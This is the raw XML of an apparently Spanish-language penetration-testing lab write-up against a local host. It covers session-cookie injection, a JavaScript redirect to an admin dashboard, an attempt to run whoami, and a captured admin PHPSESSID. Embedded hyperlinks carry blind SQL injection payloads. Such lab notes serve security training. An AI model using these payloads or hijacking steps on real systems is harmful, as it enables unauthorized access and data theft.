      <w:r w:rsidRPr="00996B60">
        <w:t xml:space="preserve"> redirigiendo a una página interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B848689" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00996B60" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996B60">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629E725" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00385DCA" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00385DCA">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3218D018" w14:textId="40956B2E" w:rsidR="00F91DEA" w:rsidRPr="00385DCA" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="00385DCA">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00385DCA">
        <w:t>div</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00385DCA">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D1FBE5" w14:textId="2D450F2B" w:rsidR="00996B60" w:rsidRPr="00385DCA" w:rsidRDefault="00996B60" w:rsidP="00996B60"/>
    <w:p w14:paraId="6D96A69F" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="0014148F" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="0014148F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Una idea sería intentar modificar el DOM de la página de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0014148F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0014148F">
        <w:t xml:space="preserve"> para ocultar el formulario de inicio de sesión y redirigir automáticamente al usuario a una página interna que supuestamente requiere autenticación, esperando que la aplicación web tenga una mala gestión de sesiones o que la cookie de sesión que has inyectado sea suficiente para considerarte como autenticado. Aquí tienes un ejemplo de cómo podría implementarse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478313A7" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="0014148F" w:rsidRDefault="00996B60" w:rsidP="00996B60"/>
    <w:p w14:paraId="1D433574" w14:textId="74D9A71C" w:rsidR="00996B60" w:rsidRPr="0014148F" w:rsidRDefault="00722CAD" w:rsidP="00996B60">
      <w:r w:rsidRPr="00722CAD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CECD0C9" wp14:editId="4B159AA8">
            <wp:extent cx="5400040" cy="1185545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1853424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244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6E5F" w14:textId="519400CA" w:rsidR="00996B60" w:rsidRDefault="00722CAD" w:rsidP="00996B60">
      <w:r>
        <w:t xml:space="preserve">Otra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cooke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> diferente al capturar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0D01F" w14:textId="2324CA2B" w:rsidR="00722CAD" w:rsidRDefault="00722CAD" w:rsidP="00996B60">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Voya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modificar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la cookie para que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>coiniicda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con la del navegador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415666EF" w14:textId="77777777" w:rsidR="00722CAD" w:rsidRDefault="00722CAD" w:rsidP="00996B60"/>
    <w:p w14:paraId="6370D7BB" w14:textId="77777777" w:rsidR="00722CAD" w:rsidRPr="0014148F" w:rsidRDefault="00722CAD" w:rsidP="00996B60"/>
    <w:p w14:paraId="12A4F414" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="0014148F" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="0014148F">
        <w:t>Este script simplemente intenta redirigir al usuario directamente a una página interna del panel de administración (`/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0014148F">
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0014148F">
        <w:t>` en este caso), con la esperanza de que la cookie de sesión `PHPSESSID` que has establecido manualmente sea suficiente para autenticarte como un usuario válido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D345444" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="0014148F" w:rsidRDefault="00996B60" w:rsidP="00996B60"/>
    <w:p w14:paraId="5EA547A9" w14:textId="36A1596D" w:rsidR="00996B60" w:rsidRDefault="0014148F" w:rsidP="00996B60">
      <w:r w:rsidRPr="0014148F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F080EA" wp14:editId="7E71F3DD">
            <wp:extent cx="5400040" cy="3484245"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1901312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12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2FB7" w14:textId="061184A0" w:rsidR="009F5DD6" w:rsidRDefault="009F5DD6" w:rsidP="00996B60">
      <w:r>
        <w:t xml:space="preserve">Vamos a probar en vez de acceder directamente a como administrador, intentar sacar una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cooke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de administrador a ver si es </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aposible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA9AF1" w14:textId="2B9AECB5" w:rsidR="009F5DD6" w:rsidRDefault="009F5DD6" w:rsidP="00996B60">
      <w:r w:rsidRPr="009F5DD6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7177A9AD" wp14:editId="7C805E02">
            <wp:extent cx="5400040" cy="3469005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="350070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709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2E7" w14:textId="75FFCACA" w:rsidR="009F5DD6" w:rsidRDefault="009F5DD6" w:rsidP="00996B60">
      <w:r>
        <w:t xml:space="preserve">No existe la carpeta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>collet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – cookie, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que voy a intentar ejecutar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comandfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoamien</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el servidor, y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> conseguir información de los usuarios si me permite ejecutar comandos, a ver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B24705" w14:textId="2A58115B" w:rsidR="009F5DD6" w:rsidRDefault="009F5DD6" w:rsidP="00996B60">
      <w:r w:rsidRPr="009F5DD6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F9E9E36" wp14:editId="6CF54FE8">
            <wp:extent cx="5400040" cy="3236595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="759013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34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07D" w14:textId="77777777" w:rsidR="00835D1A" w:rsidRDefault="00835D1A" w:rsidP="00996B60"/>
    <w:p w14:paraId="1FB0BAD9" w14:textId="2A67D1FA" w:rsidR="00835D1A" w:rsidRDefault="00835D1A" w:rsidP="00996B60">
      <w:r w:rsidRPr="00835D1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BEF3052" wp14:editId="521DA516">
            <wp:extent cx="2943636" cy="2772162"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1044710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101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B3CF" w14:textId="0BC0D01B" w:rsidR="00835D1A" w:rsidRDefault="00835D1A" w:rsidP="00996B60">
      <w:r w:rsidRPr="00835D1A">
        <w:t>PHPSESSID</w:t>
      </w:r>
      <w:r w:rsidR="003C4C36">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00835D1A">
        <w:t>"jj168ic8gkcngr0u4tmg6kt7v7"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> == ADMIN</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0083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B4E6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4E25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9A4EF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FABEE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822309">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1778023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6B"/>
    <w:rsid w:val="00044DC9"/>
    <w:rsid w:val="00093258"/>
    <w:rsid w:val="000C3DEF"/>
    <w:rsid w:val="00103189"/>
    <w:rsid w:val="0014148F"/>
    <w:rsid w:val="0016534F"/>
    <w:rsid w:val="00191C16"/>
    <w:rsid w:val="001A6E35"/>
    <w:rsid w:val="001C6B6B"/>
    <w:rsid w:val="00212F0A"/>
    <w:rsid w:val="002A7C68"/>
    <w:rsid w:val="002B6BFB"/>
    <w:rsid w:val="00385DCA"/>
    <w:rsid w:val="003A5007"/>
    <w:rsid w:val="003B0C8B"/>
    <w:rsid w:val="003C347E"/>
    <w:rsid w:val="003C4C36"/>
    <w:rsid w:val="003E3B8E"/>
    <w:rsid w:val="00412778"/>
    <w:rsid w:val="00422376"/>
    <w:rsid w:val="00427FC8"/>
    <w:rsid w:val="004A1F56"/>
    <w:rsid w:val="004E3BFC"/>
    <w:rsid w:val="004F4306"/>
    <w:rsid w:val="00565F82"/>
    <w:rsid w:val="00650C0F"/>
    <w:rsid w:val="00665A22"/>
    <w:rsid w:val="006A09EA"/>
    <w:rsid w:val="006D04AA"/>
    <w:rsid w:val="00722CAD"/>
    <w:rsid w:val="00835D1A"/>
    <w:rsid w:val="0085072B"/>
    <w:rsid w:val="008E07EF"/>
    <w:rsid w:val="009234F5"/>
    <w:rsid w:val="009235B6"/>
    <w:rsid w:val="0093631D"/>
    <w:rsid w:val="0095733E"/>
    <w:rsid w:val="009725A0"/>
    <w:rsid w:val="00996B60"/>
    <w:rsid w:val="009D59A6"/>
    <w:rsid w:val="009F5DD6"/>
    <w:rsid w:val="00A55D60"/>
    <w:rsid w:val="00A831FE"/>
    <w:rsid w:val="00B15E8A"/>
    <w:rsid w:val="00C43BE3"/>
    <w:rsid w:val="00C44E7B"/>
    <w:rsid w:val="00D37503"/>
    <w:rsid w:val="00D711C9"/>
    <w:rsid w:val="00D97AD5"/>
    <w:rsid w:val="00DD619C"/>
    <w:rsid w:val="00E07F19"/>
    <w:rsid w:val="00E2520A"/>
    <w:rsid w:val="00E46B6C"/>
    <w:rsid w:val="00E86623"/>
    <w:rsid w:val="00F12D17"/>
    <w:rsid w:val="00F77E62"/>
    <w:rsid w:val="00F9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AB87D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C489597A-55D1-49ED-A5FE-C34C6704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4E3B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E3BFC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4E3BF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E3BF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1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1DE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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F91DEA"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00665A2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5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4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76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3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08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9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19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10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%201,%201)%20=%20%27b%27--" TargetMode="External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0.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%203,%201)%20=%20%27o%27--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hyperlink" Target="http://10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%202,%201)%20=%20%27l%27--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25</Pages>
  <Words>1654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44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-22T04:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-07T20:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>